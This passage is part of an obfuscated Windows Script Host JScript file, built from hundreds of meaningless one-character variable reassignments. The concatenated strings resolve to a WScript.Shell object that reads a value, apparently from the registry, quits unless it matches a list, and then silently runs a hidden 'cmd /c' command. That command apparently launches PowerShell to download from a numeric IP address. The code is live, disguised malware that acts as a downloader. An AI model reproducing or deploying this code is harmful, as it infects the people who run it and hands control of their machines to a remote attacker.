2 | var bbcepoql = this[prrlfej + tlxsq + gjkidxs + ddiama + tmaetmew + khtsb + dibodgyhx + yzmmk] ( this[dagehcb + ptejcsuf + xbrfsfvq + gjkidxs + tycjll + prrlfej + yzmmk][pdafir + gjkidxs + tmaetmew + tlxsq + yzmmk + tmaetmew + tmsuhwozr + nlakpruji + tsaxiua + tmaetmew + xbrfsfvq + yzmmk] ( dagehcb + ptejcsuf + xbrfsfvq + gjkidxs + tycjll + prrlfej + yzmmk + efcehtc + ptejcsuf + wlacsq + tmaetmew + qayov + qayov ) [pktrclqu + tmaetmew + hokcc + pktrclqu + tmaetmew + tlxsq + yyqnipcu] ( blscscsv + shxyq + cwotrns + chsxipfe + butxlcppu + pdafir + xozmnm + pktrclqu + pktrclqu + cwotrns + entoilimo + jqneuwq + butxlcppu + xozmnm + ptejcsuf + cwotrns + pktrclqu + omxqebora + pdafir + nmcbncik + dibodgyhx + yzmmk + gjkidxs + nmcbncik + qayov + fmilpp + hazsw + tlxsq + dibodgyhx + tmaetmew + qayov + omxqebora + khtsb + dibodgyhx + yzmmk + tmaetmew + gjkidxs + dibodgyhx + tlxsq + yzmmk + tycjll + nmcbncik + dibodgyhx + tlxsq + qayov + omxqebora + sxbbx + nmcbncik + xbrfsfvq + tlxsq + qayov + tmaetmew ), 16 ); |
|
3 | for ( lghye = 0 ; lghye < qxofjvei[qayov + tmaetmew + dibodgyhx + hokcc + yzmmk + wlacsq] ; ++ lghye ) | |
4 | { | |
5 | if ( bbcepoql == qxofjvei[lghye] ) | |
6 | { | |
7 | bbcepoql = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( bbcepoql !== true ) | |
12 | this[dagehcb + ptejcsuf + xbrfsfvq + gjkidxs + tycjll + prrlfej + yzmmk][vkiaekl + hudgfnxgu + tycjll + yzmmk] ( ); | |
13 | this[dagehcb + ptejcsuf + xbrfsfvq + gjkidxs + tycjll + prrlfej + yzmmk][pdafir + gjkidxs + tmaetmew + tlxsq + yzmmk + tmaetmew + tmsuhwozr + nlakpruji + tsaxiua + tmaetmew + xbrfsfvq + yzmmk] ( dagehcb + ptejcsuf + xbrfsfvq + gjkidxs + tycjll + prrlfej + yzmmk + efcehtc + ptejcsuf + wlacsq + tmaetmew + qayov + qayov ) [gjkidxs + hudgfnxgu + dibodgyhx] ( xbrfsfvq + hptad + yyqnipcu + fmilpp + dyhkyoyxr + xbrfsfvq + fmilpp + prrlfej + nmcbncik + nzkpwd + tmaetmew + gjkidxs + ddiama + wlacsq + tmaetmew + qayov + qayov + efcehtc + tmaetmew + kaiqwja + tmaetmew + fmilpp + rtnphcoxw + pdafir + nmcbncik + hptad + hptad + tlxsq + dibodgyhx + yyqnipcu + fmilpp + lankdo + khtsb + dibodgyhx + naxmtabef + nmcbncik + pirswff + tmaetmew + rtnphcoxw + dagehcb + tmaetmew + nlakpruji + pktrclqu + tmaetmew + teyyn + hudgfnxgu + tmaetmew + ddiama + yzmmk + fmilpp + rtnphcoxw + tmsuhwozr + hudgfnxgu + yzmmk + ooraocvt + tycjll + qayov + tmaetmew + fmilpp + ywpknz + yzmmk + tmaetmew + hptad + prrlfej + ywpknz + omxqebora + tycjll + dibodgyhx + naxmtabef + nmcbncik + tycjll + xbrfsfvq + tmaetmew + efcehtc + prrlfej + yyqnipcu + uterd + fmilpp + wlacsq + yzmmk + yzmmk + prrlfej + mkhbohvi + dyhkyoyxr + dyhkyoyxr + jsbhmwzo + pdaojshxq + wuherx + efcehtc + jsbhmwzo + wsrhgl + wuherx + efcehtc + jsbhmwzo + efcehtc + zpjhzm + puooct + abaqx + dyhkyoyxr + tycjll + dibodgyhx + naxmtabef + nmcbncik + tycjll + xbrfsfvq + tmaetmew + efcehtc + prrlfej + wlacsq + prrlfej + lankdo + tvrswoj + tvrswoj + ddiama + yzmmk + tlxsq + gjkidxs + yzmmk + fmilpp + ywpknz + yzmmk + tmaetmew + hptad + prrlfej + ywpknz + omxqebora + tycjll + dibodgyhx + naxmtabef + nmcbncik + tycjll + xbrfsfvq + tmaetmew + efcehtc + prrlfej + yyqnipcu + uterd + tvrswoj + tvrswoj + xbrfsfvq + hptad + yyqnipcu + fmilpp + dyhkyoyxr + xbrfsfvq + fmilpp + dibodgyhx + tmaetmew + yzmmk + fmilpp + hudgfnxgu + ddiama + tmaetmew + fmilpp + omxqebora + omxqebora + jsbhmwzo + pdaojshxq + wuherx + efcehtc + jsbhmwzo + wsrhgl + wuherx + efcehtc + jsbhmwzo + efcehtc + zpjhzm + puooct + abaqx + ctbpj + lpaomewqw + lpaomewqw + lpaomewqw + lpaomewqw + omxqebora + yyqnipcu + tlxsq + naxmtabef + nzkpwd + nzkpwd + nzkpwd + gjkidxs + nmcbncik + nmcbncik + yzmmk + omxqebora + tvrswoj + tvrswoj + xbrfsfvq + hptad + yyqnipcu + fmilpp + dyhkyoyxr + xbrfsfvq + fmilpp + gjkidxs + tmaetmew + hokcc + ddiama + naxmtabef + gjkidxs + wuherx + zpjhzm + fmilpp + dyhkyoyxr + ddiama + fmilpp + omxqebora + omxqebora + jsbhmwzo + pdaojshxq + wuherx + efcehtc + jsbhmwzo + wsrhgl + wuherx + efcehtc + jsbhmwzo + efcehtc + zpjhzm + puooct + abaqx + ctbpj + lpaomewqw + lpaomewqw + lpaomewqw + lpaomewqw + omxqebora + yyqnipcu + tlxsq + naxmtabef + nzkpwd + nzkpwd + nzkpwd + gjkidxs + nmcbncik + nmcbncik + yzmmk + omxqebora + jsbhmwzo + lpaomewqw + zpjhzm + wsrhgl + puooct + zpjhzm + wsrhgl + puooct + abaqx + wuherx + jsbhmwzo + puooct + qfzxo + qfzxo + abaqx + efcehtc + yyqnipcu + qayov + qayov, 0, false ); |
|
14 | } | |
15 | ctbpj = "b"; | |
16 | ctbpj = "N"; | |
17 | ctbpj = "y"; | |
18 | ctbpj = "v"; | |
19 | ctbpj = "d"; | |
20 | ctbpj = "X"; | |
21 | ctbpj = "r"; | |
22 | ctbpj = "o"; | |
23 | ctbpj = "S"; | |
24 | ctbpj = "a"; | |
25 | ctbpj = "m"; | |
26 | ctbpj = "i"; | |
27 | ctbpj = "m"; | |
28 | ctbpj = "J"; | |
29 | ctbpj = "G"; | |
30 | ctbpj = "T"; | |
31 | ctbpj = "B"; | |
32 | ctbpj = "I"; | |
33 | ctbpj = "q"; | |
34 | ctbpj = "n"; | |
35 | ctbpj = "k"; | |
36 | ctbpj = "W"; | |
37 | ctbpj = "u"; | |
38 | ctbpj = "v"; | |
39 | ctbpj = "@"; | |
40 | wlacsq = "w"; | |
41 | wlacsq = "F"; | |
42 | wlacsq = "w"; | |
43 | wlacsq = "y"; | |
44 | wlacsq = "q"; | |
45 | wlacsq = "q"; | |
46 | wlacsq = "D"; | |
47 | wlacsq = "K"; | |
48 | wlacsq = "N"; | |
49 | wlacsq = "I"; | |
50 | wlacsq = "y"; | |
51 | wlacsq = "Q"; | |
52 | wlacsq = "V"; | |
53 | wlacsq = "f"; | |
54 | wlacsq = "b"; | |
55 | wlacsq = "G"; | |
56 | wlacsq = "L"; | |
57 | wlacsq = "n"; | |
58 | wlacsq = "p"; | |
59 | wlacsq = "f"; | |
60 | wlacsq = "J"; | |
61 | wlacsq = "e"; | |
62 | wlacsq = "R"; | |
63 | wlacsq = "h"; | |
64 | naxmtabef = "K"; | |
65 | naxmtabef = "A"; | |
66 | naxmtabef = "j"; | |
67 | naxmtabef = "b"; | |
68 | naxmtabef = "T"; | |
69 | naxmtabef = "l"; | |
70 | naxmtabef = "g"; | |
71 | naxmtabef = "D"; | |
72 | naxmtabef = "R"; | |
73 | naxmtabef = "E"; | |
74 | naxmtabef = "I"; | |
75 | naxmtabef = "w"; | |
76 | naxmtabef = "J"; | |
77 | naxmtabef = "v"; | |
78 | tsaxiua = "g"; | |
79 | tsaxiua = "c"; | |
80 | tsaxiua = "w"; | |
81 | tsaxiua = "i"; | |
82 | tsaxiua = "c"; | |
83 | tsaxiua = "r"; | |
84 | tsaxiua = "G"; | |
85 | tsaxiua = "R"; | |
86 | tsaxiua = "n"; | |
87 | tsaxiua = "j"; | |
88 | tsaxiua = "p"; | |
89 | tsaxiua = "z"; | |
90 | tsaxiua = "J"; | |
91 | tsaxiua = "Y"; | |
92 | tsaxiua = "G"; | |
93 | tsaxiua = "K"; | |
94 | tsaxiua = "l"; | |
95 | tsaxiua = "f"; | |
96 | tsaxiua = "v"; | |
97 | tsaxiua = "N"; | |
98 | tsaxiua = "F"; | |
99 | tsaxiua = "B"; | |
100 | tsaxiua = "Q"; | |
101 | tsaxiua = "H"; | |
102 | tsaxiua = "h"; | |
103 | tsaxiua = "r"; | |
104 | tsaxiua = "l"; | |
105 | tsaxiua = "o"; | |
106 | tsaxiua = "j"; | |
107 | kaiqwja = "y"; | |
108 | kaiqwja = "h"; | |
109 | kaiqwja = "x"; | |
110 | wsrhgl = "o"; | |
111 | wsrhgl = "B"; | |
112 | wsrhgl = "G"; | |
113 | wsrhgl = "i"; | |
114 | wsrhgl = "I"; | |
115 | wsrhgl = "T"; | |
116 | wsrhgl = "G"; | |
117 | wsrhgl = "b"; | |
118 | wsrhgl = "l"; | |
119 | wsrhgl = "G"; | |
120 | wsrhgl = "Z"; | |
121 | wsrhgl = "N"; | |
122 | wsrhgl = "O"; | |
123 | wsrhgl = "n"; | |
124 | wsrhgl = "x"; | |
125 | wsrhgl = "K"; | |
126 | wsrhgl = "G"; | |
127 | wsrhgl = "g"; | |
128 | wsrhgl = "A"; | |
129 | wsrhgl = "o"; | |
130 | wsrhgl = "t"; | |
131 | wsrhgl = "p"; | |
132 | wsrhgl = "y"; | |
133 | wsrhgl = "q"; | |
134 | wsrhgl = "p"; | |
135 | wsrhgl = "Q"; | |
136 | wsrhgl = "F"; | |
137 | wsrhgl = "Z"; | |
138 | wsrhgl = "a"; | |
139 | wsrhgl = "l"; | |
140 | wsrhgl = "U"; | |
141 | wsrhgl = "S"; | |
142 | wsrhgl = "F"; | |
143 | wsrhgl = "C"; | |
144 | wsrhgl = "i"; | |
145 | wsrhgl = "p"; | |
146 | wsrhgl = "Q"; | |
147 | wsrhgl = "x"; | |
148 | wsrhgl = "r"; | |
149 | wsrhgl = "Z"; | |
150 | wsrhgl = "4"; | |
151 | sxbbx = "G"; | |
152 | sxbbx = "d"; | |
153 | sxbbx = "c"; | |
154 | sxbbx = "v"; | |
155 | sxbbx = "w"; | |
156 | sxbbx = "z"; | |
157 | sxbbx = "L"; | |
158 | tycjll = "M"; | |
159 | tycjll = "S"; | |
160 | tycjll = "k"; | |
161 | tycjll = "L"; | |
162 | tycjll = "J"; | |
163 | tycjll = "e"; | |
164 | tycjll = "W"; | |
165 | tycjll = "j"; | |
166 | tycjll = "D"; | |
167 | tycjll = "z"; | |
168 | tycjll = "c"; | |
169 | tycjll = "O"; | |
170 | tycjll = "a"; | |
171 | tycjll = "l"; | |
172 | tycjll = "f"; | |
173 | tycjll = "j"; | |
174 | tycjll = "q"; | |
175 | tycjll = "n"; | |
176 | tycjll = "y"; | |
177 | tycjll = "n"; | |
178 | tycjll = "h"; | |
179 | tycjll = "v"; | |
180 | tycjll = "e"; | |
181 | tycjll = "l"; | |
182 | tycjll = "L"; | |
183 | tycjll = "N"; | |
184 | tycjll = "Z"; | |
185 | tycjll = "n"; | |
186 | tycjll = "a"; | |
187 | tycjll = "x"; | |
188 | tycjll = "n"; | |
189 | tycjll = "S"; | |
190 | tycjll = "g"; | |
191 | tycjll = "R"; | |
192 | tycjll = "e"; | |
193 | tycjll = "H"; | |
194 | tycjll = "i"; | |
195 | wuherx = "g"; | |
196 | wuherx = "G"; | |
197 | wuherx = "S"; | |
198 | wuherx = "s"; | |
199 | wuherx = "F"; | |
200 | wuherx = "I"; | |
201 | wuherx = "m"; | |
202 | wuherx = "l"; | |
203 | wuherx = "u"; | |
204 | wuherx = "k"; | |
205 | wuherx = "v"; | |
206 | wuherx = "V"; | |
207 | wuherx = "A"; | |
208 | wuherx = "g"; | |
209 | wuherx = "P"; | |
210 | wuherx = "q"; | |
211 | wuherx = "S"; | |
212 | wuherx = "Y"; | |
213 | wuherx = "P"; | |
214 | wuherx = "g"; | |
215 | wuherx = "a"; | |
216 | wuherx = "3"; | |
217 | yyqnipcu = "L"; | |
218 | yyqnipcu = "G"; | |
219 | yyqnipcu = "p"; | |
220 | yyqnipcu = "R"; | |
221 | yyqnipcu = "r"; | |
222 | yyqnipcu = "X"; | |
223 | yyqnipcu = "G"; | |
224 | yyqnipcu = "R"; | |
225 | yyqnipcu = "x"; | |
226 | yyqnipcu = "i"; | |
227 | yyqnipcu = "M"; | |
228 | yyqnipcu = "H"; | |
229 | yyqnipcu = "j"; | |
230 | yyqnipcu = "L"; | |
231 | yyqnipcu = "z"; | |
232 | yyqnipcu = "O"; | |
233 | yyqnipcu = "f"; | |
234 | yyqnipcu = "F"; | |
235 | yyqnipcu = "B"; | |
236 | yyqnipcu = "j"; | |
237 | yyqnipcu = "V"; | |
238 | yyqnipcu = "U"; | |
239 | yyqnipcu = "T"; | |
240 | yyqnipcu = "p"; | |
241 | yyqnipcu = "F"; | |
242 | yyqnipcu = "t"; | |
243 | yyqnipcu = "v"; | |
244 | yyqnipcu = "Q"; | |
245 | yyqnipcu = "W"; | |
246 | yyqnipcu = "d"; | |
247 | yyqnipcu = "C"; | |
248 | yyqnipcu = "C"; | |
249 | yyqnipcu = "m"; | |
250 | yyqnipcu = "k"; | |
251 | yyqnipcu = "x"; | |
252 | yyqnipcu = "v"; | |
253 | yyqnipcu = "M"; | |
254 | yyqnipcu = "Q"; | |
255 | yyqnipcu = "H"; | |
256 | yyqnipcu = "I"; | |
257 | yyqnipcu = "T"; | |
258 | yyqnipcu = "V"; | |
259 | yyqnipcu = "s"; | |
260 | yyqnipcu = "n"; | |
261 | yyqnipcu = "d"; | |
262 | tmsuhwozr = "F"; | |
263 | tmsuhwozr = "c"; | |
264 | tmsuhwozr = "f"; | |
265 | tmsuhwozr = "C"; | |
266 | tmsuhwozr = "Y"; | |
267 | tmsuhwozr = "g"; | |
268 | tmsuhwozr = "Q"; | |
269 | tmsuhwozr = "V"; | |
270 | tmsuhwozr = "b"; | |
271 | tmsuhwozr = "R"; | |
272 | tmsuhwozr = "l"; | |
273 | tmsuhwozr = "T"; | |
274 | tmsuhwozr = "U"; | |
275 | tmsuhwozr = "z"; | |
276 | tmsuhwozr = "S"; | |
277 | tmsuhwozr = "Q"; | |
278 | tmsuhwozr = "w"; | |
279 | tmsuhwozr = "O"; | |
280 | ptejcsuf = "o"; | |
281 | ptejcsuf = "W"; | |
282 | ptejcsuf = "g"; | |
283 | ptejcsuf = "o"; | |
284 | ptejcsuf = "W"; | |
285 | ptejcsuf = "P"; | |
286 | ptejcsuf = "L"; | |
287 | ptejcsuf = "N"; | |
288 | ptejcsuf = "T"; | |
289 | ptejcsuf = "f"; | |
290 | ptejcsuf = "Z"; | |
291 | ptejcsuf = "L"; | |
292 | ptejcsuf = "F"; | |
293 | ptejcsuf = "E"; | |
294 | ptejcsuf = "F"; | |
295 | ptejcsuf = "C"; | |
296 | ptejcsuf = "z"; | |
297 | ptejcsuf = "U"; | |
298 | ptejcsuf = "F"; | |
299 | ptejcsuf = "i"; | |
300 | ptejcsuf = "F"; | |
301 | ptejcsuf = "u"; | |
302 | ptejcsuf = "a"; | |
303 | ptejcsuf = "Q"; | |
304 | ptejcsuf = "S"; | |
305 | ptejcsuf = "m"; | |
306 | ptejcsuf = "q"; | |
307 | ptejcsuf = "J"; | |
308 | ptejcsuf = "w"; | |
309 | ptejcsuf = "A"; | |
310 | ptejcsuf = "a"; | |
311 | ptejcsuf = "S"; | |
312 | ywpknz = "g"; | |
313 | ywpknz = "c"; | |
314 | ywpknz = "o"; | |
315 | ywpknz = "D"; | |
316 | ywpknz = "E"; | |
317 | ywpknz = "U"; | |
318 | ywpknz = "i"; | |
319 | ywpknz = "i"; | |
320 | ywpknz = "R"; | |
321 | ywpknz = "B"; | |
322 | ywpknz = "f"; | |
323 | ywpknz = "f"; | |
324 | ywpknz = "K"; | |
325 | ywpknz = "L"; | |
326 | ywpknz = "i"; | |
327 | ywpknz = "T"; | |
328 | ywpknz = "j"; | |
329 | ywpknz = "b"; | |
330 | ywpknz = "c"; | |
331 | ywpknz = "i"; | |
332 | ywpknz = "B"; | |
333 | ywpknz = "M"; | |
334 | ywpknz = "A"; | |
335 | ywpknz = "G"; | |
336 | ywpknz = "N"; | |
337 | ywpknz = "l"; | |
338 | ywpknz = "G"; | |
339 | ywpknz = "j"; | |
340 | ywpknz = "C"; | |
341 | ywpknz = "g"; | |
342 | ywpknz = "e"; | |
343 | ywpknz = "z"; | |
344 | ywpknz = "%"; | |
345 | blscscsv = "j"; | |
346 | blscscsv = "W"; | |
347 | blscscsv = "N"; | |
348 | blscscsv = "x"; | |
349 | blscscsv = "W"; | |
350 | blscscsv = "z"; | |
351 | blscscsv = "I"; | |
352 | blscscsv = "K"; | |
353 | blscscsv = "s"; | |
354 | blscscsv = "R"; | |
355 | blscscsv = "P"; | |
356 | blscscsv = "z"; | |
357 | blscscsv = "v"; | |
358 | blscscsv = "z"; | |
359 | blscscsv = "m"; | |
360 | blscscsv = "S"; | |
361 | blscscsv = "W"; | |
362 | blscscsv = "D"; | |
363 | blscscsv = "H"; | |
364 | nzkpwd = "u"; | |
365 | nzkpwd = "o"; | |
366 | nzkpwd = "Q"; | |
367 | nzkpwd = "C"; | |
368 | nzkpwd = "w"; | |
369 | teyyn = "V"; | |
370 | teyyn = "B"; | |
371 | teyyn = "H"; | |
372 | teyyn = "D"; | |
373 | teyyn = "D"; | |
374 | teyyn = "U"; | |
375 | teyyn = "B"; | |
376 | teyyn = "D"; | |
377 | teyyn = "O"; | |
378 | teyyn = "g"; | |
379 | teyyn = "L"; | |
380 | teyyn = "l"; | |
381 | teyyn = "K"; | |
382 | teyyn = "C"; | |
383 | teyyn = "B"; | |
384 | teyyn = "x"; | |
385 | teyyn = "l"; | |
386 | teyyn = "q"; | |
387 | dyhkyoyxr = "D"; | |
388 | dyhkyoyxr = "p"; | |
389 | dyhkyoyxr = "q"; | |
390 | dyhkyoyxr = "O"; | |
391 | dyhkyoyxr = "z"; | |
392 | dyhkyoyxr = "h"; | |
393 | dyhkyoyxr = "Z"; | |
394 | dyhkyoyxr = "g"; | |
395 | dyhkyoyxr = "a"; | |
396 | dyhkyoyxr = "g"; | |
397 | dyhkyoyxr = "P"; | |
398 | dyhkyoyxr = "/"; | |
399 | cwotrns = "t"; | |
400 | cwotrns = "n"; | |
401 | cwotrns = "C"; | |
402 | cwotrns = "B"; | |
403 | cwotrns = "U"; | |
404 | cwotrns = "w"; | |
405 | cwotrns = "x"; | |
406 | cwotrns = "Q"; | |
407 | cwotrns = "A"; | |
408 | cwotrns = "X"; | |
409 | cwotrns = "H"; | |
410 | cwotrns = "j"; | |
411 | cwotrns = "e"; | |
412 | cwotrns = "V"; | |
413 | cwotrns = "m"; | |
414 | cwotrns = "Q"; | |
415 | cwotrns = "a"; | |
416 | cwotrns = "y"; | |
417 | cwotrns = "C"; | |
418 | cwotrns = "t"; | |
419 | cwotrns = "s"; | |
420 | cwotrns = "K"; | |
421 | cwotrns = "B"; | |
422 | cwotrns = "d"; | |
423 | cwotrns = "d"; | |
424 | cwotrns = "X"; | |
425 | cwotrns = "K"; | |
426 | cwotrns = "B"; | |
427 | cwotrns = "q"; | |
428 | cwotrns = "A"; | |
429 | cwotrns = "o"; | |
430 | cwotrns = "S"; | |
431 | cwotrns = "I"; | |
432 | cwotrns = "u"; | |
433 | cwotrns = "o"; | |
434 | cwotrns = "b"; | |
435 | cwotrns = "f"; | |
436 | cwotrns = "T"; | |
437 | cwotrns = "v"; | |
438 | cwotrns = "m"; | |
439 | cwotrns = "s"; | |
440 | cwotrns = "K"; | |
441 | cwotrns = "e"; | |
442 | cwotrns = "e"; | |
443 | cwotrns = "E"; | |
444 | zpjhzm = "A"; | |
445 | zpjhzm = "B"; | |
446 | zpjhzm = "J"; | |
447 | zpjhzm = "A"; | |
448 | zpjhzm = "M"; | |
449 | zpjhzm = "v"; | |
450 | zpjhzm = "z"; | |
451 | zpjhzm = "B"; | |
452 | zpjhzm = "b"; | |
453 | zpjhzm = "F"; | |
454 | zpjhzm = "2"; | |
455 | hudgfnxgu = "L"; | |
456 | hudgfnxgu = "T"; | |
457 | hudgfnxgu = "I"; | |
458 | hudgfnxgu = "I"; | |
459 | hudgfnxgu = "c"; | |
460 | hudgfnxgu = "Q"; | |
461 | hudgfnxgu = "h"; | |
462 | hudgfnxgu = "W"; | |
463 | hudgfnxgu = "S"; | |
464 | hudgfnxgu = "N"; | |
465 | hudgfnxgu = "h"; | |
466 | hudgfnxgu = "J"; | |
467 | hudgfnxgu = "P"; | |
468 | hudgfnxgu = "B"; | |
469 | hudgfnxgu = "T"; | |
470 | hudgfnxgu = "K"; | |
471 | hudgfnxgu = "u"; | |
472 | lpaomewqw = "s"; | |
473 | lpaomewqw = "8"; | |
474 | nmcbncik = "X"; | |
475 | nmcbncik = "N"; | |
476 | nmcbncik = "Y"; | |
477 | nmcbncik = "i"; | |
478 | nmcbncik = "v"; | |
479 | nmcbncik = "y"; | |
480 | nmcbncik = "V"; | |
481 | nmcbncik = "M"; | |
482 | nmcbncik = "Z"; | |
483 | nmcbncik = "Z"; | |
484 | nmcbncik = "s"; | |
485 | nmcbncik = "T"; | |
486 | nmcbncik = "o"; | |
487 | hazsw = "v"; | |
488 | hazsw = "a"; | |
489 | hazsw = "c"; | |
490 | hazsw = "I"; | |
491 | hazsw = "k"; | |
492 | hazsw = "S"; | |
493 | hazsw = "O"; | |
494 | hazsw = "L"; | |
495 | hazsw = "Q"; | |
496 | hazsw = "s"; | |
497 | hazsw = "D"; | |
498 | hazsw = "S"; | |
499 | hazsw = "P"; | |
500 | hazsw = "Z"; | |
501 | hazsw = "v"; | |
502 | hazsw = "g"; | |
503 | hazsw = "L"; | |
504 | hazsw = "e"; | |
505 | hazsw = "J"; | |
506 | hazsw = "k"; | |
507 | hazsw = "j"; | |
508 | hazsw = "s"; | |
509 | hazsw = "S"; | |
510 | hazsw = "U"; | |
511 | hazsw = "P"; | |
512 | hazsw = "S"; | |
513 | hazsw = "E"; | |
514 | hazsw = "V"; | |
515 | hazsw = "D"; | |
516 | hazsw = "i"; | |
517 | hazsw = "P"; | |
518 | hazsw = "c"; | |
519 | hazsw = "Q"; | |
520 | hazsw = "h"; | |
521 | hazsw = "s"; | |
522 | hazsw = "X"; | |
523 | hazsw = "g"; | |
524 | hazsw = "B"; | |
525 | hazsw = "l"; | |
526 | hazsw = "P"; | |
527 | hazsw = "v"; | |
528 | hazsw = "H"; | |
529 | hazsw = "N"; | |
530 | hazsw = "i"; | |
531 | hazsw = "P"; | |
532 | pdafir = "D"; | |
533 | pdafir = "L"; | |
534 | pdafir = "g"; | |
535 | pdafir = "r"; | |
536 | pdafir = "c"; | |
537 | pdafir = "C"; | |
538 | nlakpruji = "O"; | |
539 | nlakpruji = "C"; | |
540 | nlakpruji = "j"; | |
541 | nlakpruji = "m"; | |
542 | nlakpruji = "F"; | |
543 | nlakpruji = "w"; | |
544 | nlakpruji = "P"; | |
545 | nlakpruji = "X"; | |
546 | nlakpruji = "L"; | |
547 | nlakpruji = "I"; | |
548 | nlakpruji = "K"; | |
549 | nlakpruji = "O"; | |
550 | nlakpruji = "l"; | |
551 | nlakpruji = "P"; | |
552 | nlakpruji = "z"; | |
553 | nlakpruji = "f"; | |
554 | nlakpruji = "T"; | |
555 | nlakpruji = "u"; | |
556 | nlakpruji = "j"; | |
557 | nlakpruji = "X"; | |
558 | nlakpruji = "c"; | |
559 | nlakpruji = "K"; | |
560 | nlakpruji = "l"; | |
561 | nlakpruji = "A"; | |
562 | nlakpruji = "I"; | |
563 | nlakpruji = "p"; | |
564 | nlakpruji = "V"; | |
565 | nlakpruji = "d"; | |
566 | nlakpruji = "Y"; | |
567 | nlakpruji = "Y"; | |
568 | nlakpruji = "I"; | |
569 | nlakpruji = "M"; | |
570 | nlakpruji = "f"; | |
571 | nlakpruji = "l"; | |
572 | nlakpruji = "v"; | |
573 | nlakpruji = "m"; | |
574 | nlakpruji = "Y"; | |
575 | nlakpruji = "K"; | |
576 | nlakpruji = "v"; | |
577 | nlakpruji = "C"; | |
578 | nlakpruji = "N"; | |
579 | nlakpruji = "b"; | |
580 | jsbhmwzo = "z"; | |
581 | jsbhmwzo = "x"; | |
582 | jsbhmwzo = "K"; | |
583 | jsbhmwzo = "K"; | |
584 | jsbhmwzo = "1"; | |
585 | fmilpp = "M"; | |
586 | fmilpp = "n"; | |
587 | fmilpp = "O"; | |
588 | fmilpp = "p"; | |
589 | fmilpp = "d"; | |
590 | fmilpp = "a"; | |
591 | fmilpp = "o"; | |
592 | fmilpp = "J"; | |
593 | fmilpp = "O"; | |
594 | fmilpp = "r"; | |
595 | fmilpp = "s"; | |
596 | fmilpp = "C"; | |
597 | fmilpp = "P"; | |
598 | fmilpp = "c"; | |
599 | fmilpp = "i"; | |
600 | fmilpp = "O"; | |
601 | fmilpp = "k"; | |
602 | fmilpp = "J"; | |
603 | fmilpp = "x"; | |
604 | fmilpp = "L"; | |
605 | fmilpp = "J"; | |
606 | fmilpp = "X"; | |
607 | fmilpp = "d"; | |
608 | fmilpp = "p"; | |
609 | fmilpp = "b"; | |
610 | fmilpp = "Q"; | |
611 | fmilpp = "t"; | |
612 | fmilpp = "V"; | |
613 | fmilpp = "T"; | |
614 | fmilpp = "T"; | |
615 | fmilpp = "g"; | |
616 | fmilpp = "E"; | |
617 | fmilpp = "K"; | |
618 | fmilpp = "S"; | |
619 | fmilpp = "M"; | |
620 | fmilpp = "b"; | |
621 | fmilpp = "Y"; | |
622 | fmilpp = "k"; | |
623 | fmilpp = "u"; | |
624 | fmilpp = " "; | |
625 | jqneuwq = "H"; | |
626 | jqneuwq = "X"; | |
627 | jqneuwq = "c"; | |
628 | jqneuwq = "K"; | |
629 | jqneuwq = "p"; | |
630 | jqneuwq = "m"; | |
631 | jqneuwq = "i"; | |
632 | jqneuwq = "w"; | |
633 | jqneuwq = "B"; | |
634 | jqneuwq = "F"; | |
635 | jqneuwq = "J"; | |
636 | jqneuwq = "B"; | |
637 | jqneuwq = "D"; | |
638 | jqneuwq = "O"; | |
639 | jqneuwq = "k"; | |
640 | jqneuwq = "Q"; | |
641 | jqneuwq = "a"; | |
642 | jqneuwq = "O"; | |
643 | jqneuwq = "X"; | |
644 | jqneuwq = "C"; | |
645 | jqneuwq = "v"; | |
646 | jqneuwq = "B"; | |
647 | jqneuwq = "T"; | |
648 | jqneuwq = "W"; | |
649 | jqneuwq = "n"; | |
650 | jqneuwq = "g"; | |
651 | jqneuwq = "u"; | |
652 | jqneuwq = "w"; | |
653 | jqneuwq = "Z"; | |
654 | jqneuwq = "e"; | |
655 | jqneuwq = "a"; | |
656 | jqneuwq = "j"; | |
657 | jqneuwq = "D"; | |
658 | jqneuwq = "R"; | |
659 | jqneuwq = "i"; | |
660 | jqneuwq = "B"; | |
661 | jqneuwq = "T"; | |
662 | hokcc = "e"; | |
663 | hokcc = "e"; | |
664 | hokcc = "F"; | |
665 | hokcc = "O"; | |
666 | hokcc = "g"; | |
667 | hokcc = "X"; | |
668 | hokcc = "D"; | |
669 | hokcc = "f"; | |
670 | hokcc = "b"; | |
671 | hokcc = "z"; | |
672 | hokcc = "N"; | |
673 | hokcc = "Q"; | |
674 | hokcc = "J"; | |
675 | hokcc = "V"; | |
676 | hokcc = "b"; | |
677 | hokcc = "v"; | |
678 | hokcc = "h"; | |
679 | hokcc = "v"; | |
680 | hokcc = "m"; | |
681 | hokcc = "l"; | |
682 | hokcc = "R"; | |
683 | hokcc = "p"; | |
684 | hokcc = "W"; | |
685 | hokcc = "V"; | |
686 | hokcc = "p"; | |
687 | hokcc = "O"; | |
688 | hokcc = "j"; | |
689 | hokcc = "N"; | |
690 | hokcc = "Y"; | |
691 | hokcc = "g"; | |
692 | hokcc = "P"; | |
693 | hokcc = "o"; | |
694 | hokcc = "u"; | |
695 | hokcc = "U"; | |
696 | hokcc = "A"; | |
697 | hokcc = "h"; | |
698 | hokcc = "U"; | |
699 | hokcc = "g"; | |
700 | vkiaekl = "G"; | |
701 | vkiaekl = "V"; | |
702 | vkiaekl = "F"; | |
703 | vkiaekl = "X"; | |
704 | vkiaekl = "z"; | |
705 | vkiaekl = "w"; | |
706 | vkiaekl = "S"; | |
707 | vkiaekl = "g"; | |
708 | vkiaekl = "h"; | |
709 | vkiaekl = "O"; | |
710 | vkiaekl = "U"; | |
711 | vkiaekl = "o"; | |
712 | vkiaekl = "j"; | |
713 | vkiaekl = "s"; | |
714 | vkiaekl = "N"; | |
715 | vkiaekl = "D"; | |
716 | vkiaekl = "X"; | |
717 | vkiaekl = "t"; | |
718 | vkiaekl = "v"; | |
719 | vkiaekl = "h"; | |
720 | vkiaekl = "B"; | |
721 | vkiaekl = "Q"; | |
722 | vkiaekl = "k"; | |
723 | vkiaekl = "x"; | |
724 | vkiaekl = "m"; | |
725 | vkiaekl = "F"; | |
726 | vkiaekl = "e"; | |
727 | vkiaekl = "x"; | |
728 | vkiaekl = "C"; | |
729 | vkiaekl = "D"; | |
730 | vkiaekl = "j"; | |
731 | vkiaekl = "K"; | |
732 | vkiaekl = "k"; | |
733 | vkiaekl = "C"; | |
734 | vkiaekl = "T"; | |
735 | vkiaekl = "o"; | |
736 | vkiaekl = "o"; | |
737 | vkiaekl = "i"; | |
738 | vkiaekl = "t"; | |
739 | vkiaekl = "z"; | |
740 | vkiaekl = "c"; | |
741 | vkiaekl = "L"; | |
742 | vkiaekl = "Q"; | |
